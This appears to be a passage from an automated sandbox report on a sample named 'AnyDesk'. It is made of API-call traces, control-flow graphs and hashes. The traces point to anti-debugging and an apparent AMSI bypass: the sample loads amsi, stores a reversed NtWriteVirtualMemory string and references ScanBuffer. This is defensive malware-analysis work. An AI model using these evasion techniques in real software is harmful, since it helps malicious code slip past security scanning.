4754->4737
            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4E790), ref: 02B25AE8
            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B06
            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B24
            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25B42
            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B8B
            • RegQueryValueExA.ADVAPI32(?,02B25D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001), ref: 02B25BA9
            • RegCloseKey.ADVAPI32(?,02B25BD8,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25BCB
            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25BE8
            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BF5
            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BFB
            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25C26
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C6D
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C7D
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25CA5
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25CB5
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25CDB
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25CEB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
            • API String ID: 1759228003-2375825460
            • Opcode ID: 32726812b6fe90e2f89193f47e8cb84b92aa4603d1eb9f459080d5a52a0249f9
            • Instruction ID: c288e24e184b25ffa15e4740e4c97dc4cf02972ee292ebb0165217ce5320c4f9
            • Opcode Fuzzy Hash: 32726812b6fe90e2f89193f47e8cb84b92aa4603d1eb9f459080d5a52a0249f9
            • Instruction Fuzzy Hash: FB515771A5036C7AFB35D6A88C46FEF77ADDB04744F4001E1BA4CE6181E7749A488FA1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4830 2b3f744-2b3f75e GetModuleHandleW 4831 2b3f760-2b3f772 GetProcAddress 4830->4831 4832 2b3f78a-2b3f792 4830->4832 4831->4832 4833 2b3f774-2b3f784 CheckRemoteDebuggerPresent 4831->4833 4833->4832 4834 2b3f786 4833->4834 4834->4832
            APIs
            • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3F754
            • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3F766
            • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3F77D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
            • String ID: CheckRemoteDebuggerPresent$KernelBase
            • API String ID: 35162468-539270669
            • Opcode ID: d2602d963ad197602b0ff9f0359c11d2e20625834c0824566c7e9024229995b0
            • Instruction ID: c06bd8e5d8b9ecb4dbf071c375e9d9da57031f89930f268349bd62d1710b7a66
            • Opcode Fuzzy Hash: d2602d963ad197602b0ff9f0359c11d2e20625834c0824566c7e9024229995b0
            • Instruction Fuzzy Hash: 53F0A070D04258FAEB13A6B888897EDFBA99B09328F2443D0E435A25D1E7711684CA91

            Control-flow Graph

            APIs
              • Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E
            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDAB
            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DE40), ref: 02B3DDDB
            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DDF0
            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DE1C
            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DE25
              • Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
            • String ID:
            • API String ID: 1897104825-0
            • Opcode ID: d8db1280009a71be50e4d4afaa3d878fbbace144fc72ce0e6e688b2438c9388f
            • Instruction ID: 00296453be3aac2ce27f435f4e04383783d915955da3a2682a4c23c852dc0511
            • Opcode Fuzzy Hash: d8db1280009a71be50e4d4afaa3d878fbbace144fc72ce0e6e688b2438c9388f
            • Instruction Fuzzy Hash: 6821C071A40319BAEB51EBE4CC52FDEB7BDEB48700F5104A1B704F7580EA74AA088B55

            Control-flow Graph

            APIs
            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E5F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: CheckConnectionInternet
            • String ID: Initialize$OpenSession$ScanBuffer
            • API String ID: 3847983778-3852638603
            • Opcode ID: 46d6b4152e7173255bcde76f28ec42989b7bbeeca54f783faead6d167eaae1da
            • Instruction ID: 2f9584939bc65658355cf967a763aa95de9791c062e2b6514b00d6b48d0f64a5
            • Opcode Fuzzy Hash: 46d6b4152e7173255bcde76f28ec42989b7bbeeca54f783faead6d167eaae1da
            • Instruction Fuzzy Hash: 92413235B1021C9FEB02EBA4D841EDEB3FAEF88700F2044A6E145A7A51DA70ED09CF55

            Control-flow Graph

            APIs
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E
              • Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9
            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: HandleModule$AddressProc$MemoryVirtualWrite
            • String ID: Ntdll$yromeMlautriVetirW
            • API String ID: 2719805696-3542721025
            • Opcode ID: 41516c37e1b0b88097df43da733569ae0a79017d2998c3b6ff4eddd0d2503022
            • Instruction ID: b34c6361575f1d20452a347ef9cd35e56c4b1a68b16d03faac54e2f734ddefd0
            • Opcode Fuzzy Hash: 41516c37e1b0b88097df43da733569ae0a79017d2998c3b6ff4eddd0d2503022
            • Instruction Fuzzy Hash: FB018CB6644218AFDB02EF98DC42E9EB7FDEB4D700F5188D0B904D7600CA30AD15AF61

            Control-flow Graph

            APIs
              • Part of subcall function 02B36D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36DB9,?,?,?,00000000), ref: 02B36D99
            • CoCreateInstance.OLE32(?,00000000,00000005,02B36EAC,00000000,00000000,02B36E2B,?,00000000,02B36E9B), ref: 02B36E17
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: CreateFromInstanceProg
            • String ID:
            • API String ID: 2151042543-0
            • Opcode ID: 59e0c1aa7accec5c0b7c63b964824d71285b660e9da91b94f2455a33f286c52f
            • Instruction ID: 9f5c991c44dbc8742fbb1ce6aff1ec60d0ab5fdadddc2f7d4f2c541ecd0450bb
            • Opcode Fuzzy Hash: 59e0c1aa7accec5c0b7c63b964824d71285b660e9da91b94f2455a33f286c52f
            • Instruction Fuzzy Hash: BD012B31208704BFF716EF61DC1296F7BFDD749B00F5108B5F405D2650EA309914C968

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4755 2b21724-2b21736 4756 2b21968-2b2196d 4755->4756 4757 2b2173c-2b2174c 4755->4757 4760 2b21973-2b21984 4756->4760 4761 2b21a80-2b21a83 4756->4761 4758 2b217a4-2b217ad 4757->4758 4759 2b2174e-2b2175b 4757->4759 4758->4759 4766 2b217af-2b217bb 4758->4766 4762 2b21774-2b21780 4759->4762 4763 2b2175d-2b2176a 4759->4763 4764 2b21986-2b219a2 4760->4764 4765 2b21938-2b21945 4760->4765 4767 2b21684-2b216ad VirtualAlloc 4761->4767 4768 2b21a89-2b21a8b 4761->4768 4774 2b21782-2b21790 4762->4774 4775 2b217f0-2b217f9 4762->4775 4769 2b21794-2b217a1 4763->4769 4770 2b2176c-2b21770 4763->4770 4776 2b219b0-2b219bf 4764->4776 4777 2b219a4-2b219ac 4764->4777 4765->4764 4771 2b21947-2b2195b Sleep 4765->4771 4766->4759 4778 2b217bd-2b217c9 4766->4778 4772 2b216df-2b216e5 4767->4772 4773 2b216af-2b216dc call 2b21644 4767->4773 4771->4764 4781 2b2195d-2b21964 Sleep 4771->4781 4773->4772 4779 2b217fb-2b21808 4775->4779 4780 2b2182c-2b21836 4775->4780 4784 2b219c1-2b219d5 4776->4784 4785 2b219d8-2b219e0 4776->4785 4783 2b21a0c-2b21a22 4777->4783 4778->4759 4786 2b217cb-2b217de Sleep 4778->4786 4779->4780 4787 2b2180a-2b2181e Sleep 4779->4787 4788 2b218a8-2b218b4 4780->4788 4789 2b21838-2b21863 4780->4789 4781->4765 4790 2b21a24-2b21a32 4783->4790 4791 2b21a3b-2b21a47 4783->4791 4784->4783 4794 2b219e2-2b219fa 4785->4794 4795 2b219fc-2b219fe call 2b215cc 4785->4795 4786->4759 4793 2b217e4-2b217eb Sleep 4786->4793 4787->4780 4798 2b21820-2b21827 Sleep 4787->4798 4804 2b218b6-2b218c8 4788->4804 4805 2b218dc-2b218eb call 2b215cc 4788->4805 4799 2b21865-2b21873 4789->4799 4800 2b2187c-2b2188a 4789->4800 4790->4791 4801 2b21a34 4790->4801 4802 2b21a68 4791->4802 4803 2b21a49-2b21a5c 4791->4803 4793->4758 4796 2b21a03-2b21a0b 4794->4796 4795->4796 4798->4779 4799->4800 4807 2b21875 4799->4807 4808 2b218f8 4800->4808 4809 2b2188c-2b218a6 call 2b21500 4800->4809 4801->4791 4811 2b21a6d-2b21a7f 4802->4811 4810 2b21a5e-2b21a63 call 2b21500 4803->4810 4803->4811 4812 2b218ca 4804->4812 4813 2b218cc-2b218da 4804->4813 4815 2b218fd-2b21936 4805->4815 4818 2b218ed-2b218f7 4805->4818 4807->4800 4808->4815 4809->4815 4810->4811 4812->4813 4813->4815
            APIs
            • Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
            • Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 8bada386a870d20725908b21230689db3921679429af0ef5c47825145c68af56
            • Instruction ID: 64ce3a73e4f3340c5b51b9c6191a61975cd2e9b6a1ce17efe8643ca37e06051e
            • Opcode Fuzzy Hash: 8bada386a870d20725908b21230689db3921679429af0ef5c47825145c68af56
            • Instruction Fuzzy Hash: 04B12472A103A08BCB15CF2CD8C0366BBF1EB86351F1986EED55D8B396D7B09459CB90

            Control-flow Graph

            APIs
            • LoadLibraryW.KERNEL32(amsi), ref: 02B388C1
              • Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9
              • Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC
            • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B38920
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
            • String ID: DllGetClassObject$W$amsi
            • API String ID: 941070894-2671292670
            • Opcode ID: 2aafe512bb286c2c8bbcc11adbc4290f93bae2f825816b449bdd991a89be9e6a
            • Instruction ID: f5a451e37b535fc1ca397fe4a0723df43bada7dd1e7fd48acbc8ece9f2355883
            • Opcode Fuzzy Hash: 2aafe512bb286c2c8bbcc11adbc4290f93bae2f825816b449bdd991a89be9e6a
            • Instruction Fuzzy Hash: 65F0449054C381B9D302E6748C45F4BBFCD4B62264F448B98F1E85A2D2D675D1059B67

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4835 2b21a8c-2b21a9b 4836 2b21aa1-2b21aa5 4835->4836 4837 2b21b6c-2b21b6f 4835->4837 4840 2b21aa7-2b21aae 4836->4840 4841 2b21b08-2b21b11 4836->4841 4838 2b21b75-2b21b7f 4837->4838 4839 2b21c5c-2b21c60 4837->4839 4842 2b21b81-2b21b8d 4838->4842 4843 2b21b3c-2b21b49 4838->4843 4846 2b21c66-2b21c6b 4839->4846 4847 2b216e8-2b2170b call 2b21644 VirtualFree 4839->4847 4844 2b21ab0-2b21abb 4840->4844 4845 2b21adc-2b21ade 4840->4845 4841->4840 4848 2b21b13-2b21b27 Sleep 4841->4848 4849 2b21bc4-2b21bd2 4842->4849 4850 2b21b8f-2b21b92 4842->4850 4843->4842 4857 2b21b4b-2b21b5f Sleep 4843->4857 4851 2b21ac4-2b21ad9 4844->4851 4852 2b21abd-2b21ac2 4844->4852 4853 2b21af3 4845->4853 4854 2b21ae0-2b21af1 4845->4854 4866 2b21716 4847->4866 4867 2b2170d-2b21714 4847->4867 4848->4840 4856 2b21b2d-2b21b38 Sleep 4848->4856 4858 2b21b96-2b21b9a 4849->4858 4860 2b21bd4-2b21bd9 call 2b214c0 4849->4860 4850->4858 4859 2b21af6-2b21b03 4853->4859 4854->4853 4854->4859 4856->4841 4857->4842 4862 2b21b61-2b21b68 Sleep 4857->4862 4863 2b21bdc-2b21be9 4858->4863 4864 2b21b9c-2b21ba2 4858->4864 4859->4838 4860->4858 4862->4843 4863->4864 4872 2b21beb-2b21bf2 call 2b214c0 4863->4872 4868 2b21bf4-2b21bfe 4864->4868 4869 2b21ba4-2b21bc2 call 2b21500 4864->4869 4871 2b21719-2b21723 4866->4871 4867->4871 4873 2b21c00-2b21c28 VirtualFree 4868->4873 4874 2b21c2c-2b21c59 call 2b21560 4868->4874 4872->4864
            APIs
            • Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 2b640e81a77d469e38a0d321ae2488ee39c887a81d941ee7d6c0a3b1d509ce3d
            • Instruction ID: e60deee50405055af7dff1d4dfec1423d282340ed0690b5f5a9f753e8d824aba
            • Opcode Fuzzy Hash: 2b640e81a77d469e38a0d321ae2488ee39c887a81d941ee7d6c0a3b1d509ce3d
            • Instruction Fuzzy Hash: 9951AF716213608FDB15CF6CC989766BBE4EF46314F1886EED44CCB293E7A09449CB91

            Control-flow Graph

            APIs
            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E5F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: CheckConnectionInternet
            • String ID: Initialize$OpenSession$ScanBuffer
            • API String ID: 3847983778-3852638603
            • Opcode ID: 6bcba793aca467c321c1387fb561e0e589248d0575b26dabe2a7be937be813da
            • Instruction ID: 75a2493cae8133e56ca8d59f217648d15a20c1265ac10167807aa4661a3133fa
            • Opcode Fuzzy Hash: 6bcba793aca467c321c1387fb561e0e589248d0575b26dabe2a7be937be813da
            • Instruction Fuzzy Hash: D2412F35B1021C9FEB02EBA4D841EDEB3FAEF88700F2044A6E145A7A51DA70ED098F55

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 5014 2b2e364-2b2e370 5015 2b2e372-2b2e378 VariantClear call 2b2e030 5014->5015 5016 2b2e37f-2b2e384 5014->5016 5020 2b2e37d 5015->5020 5018 2b2e386-2b2e393 call 2b244dc 5016->5018 5019 2b2e395-2b2e39a 5016->5019 5026 2b2e3db-2b2e3de 5018->5026 5022 2b2e3a6-2b2e3ab 5019->5022 5023 2b2e39c-2b2e3a4 5019->5023 5020->5026 5024 2b2e3b6-2b2e3c1 call 2b32ea4 5022->5024 5025 2b2e3ad-2b2e3b4 call 2b2e1e8 5022->5025 5023->5026 5033 2b2e3c3-2b2e3cd 5024->5033 5034 2b2e3cf-2b2e3d6 VariantClear VariantInit 5024->5034 5025->5026 5033->5026 5034->5026
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 347e81542a48324c9b35fcf9ccef957cbf0b6ad69fb7e0a0f1367c704a4d45c9
            • Instruction ID: 8ce3d4e6dac0cc282565b1a16689287af48ac10c65e31854978d66baac957ab0
            • Opcode Fuzzy Hash: 347e81542a48324c9b35fcf9ccef957cbf0b6ad69fb7e0a0f1367c704a4d45c9
            • Instruction Fuzzy Hash: 01F06221708330C7DB267B3B8E846AD379ADF4038275094F6A40E9B215DF64EC4EC762

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 5036 2b370dc-2b37126 call 2b24f40 5039 2b37128-2b3713a call 2b2b048 call 2b23e98 5036->5039 5040 2b3713f-2b37141 5036->5040 5039->5040 5042 2b37147-2b3715b 5040->5042 5043 2b37308-2b3732f 5040->5043 5047 2b3715d-2b37177 5042->5047 5045 2b37331-2b37340 5043->5045 5046 2b37359-2b3735c 5043->5046 5049 2b37342 5045->5049 5050 2b37347-2b37357 5045->5050 5051 2b3735e-2b37360 5046->5051 5052 2b3736d-2b37389 5046->5052 5053 2b37191-2b37195 5047->5053 5054 2b37179-2b3718c 5047->5054 5049->5050 5050->5052 5051->5052 5055 2b37362-2b37366 5051->5055 5064 2b3738e-2b37390 5052->5064 5057 2b37197-2b371a6 5053->5057 5058 2b3720b-2b3720d 5053->5058 5056 2b372ff-2b37302 5054->5056 5055->5052 5061 2b37368 5055->5061 5056->5043 5056->5047 5062 2b371d8-2b37200 call 2b253b0 5057->5062 5063 2b371a8-2b371d6 call 2b253b0 5057->5063 5059 2b37254-2b37258 5058->5059 5060 2b3720f-2b37213 5058->5060 5070 2b3725a-2b37262 5059->5070 5071 2b372cd-2b372e4 5059->5071 5068 2b37237-2b3724f 5060->5068 5069 2b37215-2b3721f 5060->5069 5061->5052 5083 2b37203-2b37206 5062->5083 5063->5083 5065 2b37392-2b37395 call 2b376b4 5064->5065 5066 2b3739a-2b3739f 5064->5066 5065->5066 5077 2b373a1-2b373ae 5066->5077 5078 2b373bd-2b373cf 5066->5078 5075 2b372fb 5068->5075 5069->5068 5079 2b37221-2b37232 call 2b2ead8 5069->5079 5080 2b372a2-2b372cb 5070->5080 5081 2b37264-2b372a0 call 2b253b0 5070->5081 5074 2b372e6-2b372ea 5071->5074 5071->5075 5074->5075 5084 2b372ec-2b372f8 5074->5084 5075->5056 5085 2b373b0-2b373b4 call 2b2538c 5077->5085 5086 2b373b9-2b373bb 5077->5086 5091 2b373e3 5078->5091 5092 